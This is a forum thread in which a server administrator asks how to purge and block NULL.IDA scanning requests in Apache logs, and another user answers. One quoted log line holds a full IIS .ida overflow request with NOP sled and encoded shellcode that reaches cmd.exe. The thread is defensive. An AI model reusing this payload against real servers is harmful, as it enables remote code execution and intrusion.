清除NULL.IDA扫描主机记录

jackieyuan

不知道大家有没有相同经历，我的apache的log文件里面经常会有过大的单行记录导致webalizer的一些分析程序报错：

1. 
   
2. Warning: Truncating oversized referrer field [987965]
   
3. Warning: Truncating oversized referrer field [1046527]
   
4. Warning: Truncating oversized referrer field [1088449]

复制代码

在我的apache的log中有类似以下的记录

1. 61.150.72.86 - - [15/Feb/2004:14:14:14 +0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e5%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0\x8d}-\x90\x90\x90\x8b\xf7f\xb8H\x063\xc9f\x8b\xc8\xb4\x99\xfc\xac2\xc4\xaa\xe2\xfa\x14$\xec\x9f\x99\x99e\xaaP(\xb9)\xbdk7_\xdef\x99q\x94\x9d\x99\x99q\x16\x9d\x99\x99q\xd7\x9b\x99\x99\x10\x1c\xda\x9c\x99\x99q\xc8\x9b\x99\x99q\xbd\x9a\x99\x99\x10\x1c\xde\x9c\x99\x99q'\x98\x99\x99\x10\x1c\xd6\x9c\x99\x99\x12\x1c\xde\x9c\x99\x99q\xe6\x9b\x99\x99\x10\x1c\xd2\x9c\x99\x99q\xc7\x99\x99\x99q\b\x99\x99\x99\x1aa\x99\xedy\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x94\x9f\x99\x99\x12\x1c\xde\x9c\x99\x99\xc9f\x0c\x94\x9f\x99\x99xf8\xeb\xe0\xd8\x99\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd\xeb\xfc\xea\xea\x99\xea\xeb\x7f\xee\xa8\xe9\x7f\xee\x99\xfa\xa4\x01b\xddcmd.exe$ HTTP/1.1" 404 4917 "-" "-"

复制代码

现在我能够通过以下语句来查找出扫描我的主机ip：

1. less /usr/local/apache2/logs/www.domain.com-access_log | grep NULL.IDA | awk '{print $1}'  >;>; /home/www/public_html/ida.txt &

复制代码

但是请教各位怎么样把log文件中的这些行删除，并且自动阻止这些主机地址。

谢谢！

我的系统：
Redhat9.0+apache 2.0.47+Perl5.8.4+PHP

HonestQiao

可以判断url的类型，是否包含这个，然后设置一个便量。

在记录日值的时候去掉

jackieyuan

原帖由 "HonestQiao" 发表：
可以判断url的类型，是否包含这个，然后设置一个便量。

在记录日值的时候去掉

谢谢 HonestQiao，我不是很懂这些，请你能不能写一些参考文档或者帮忙写几句具体的方法和命令阿？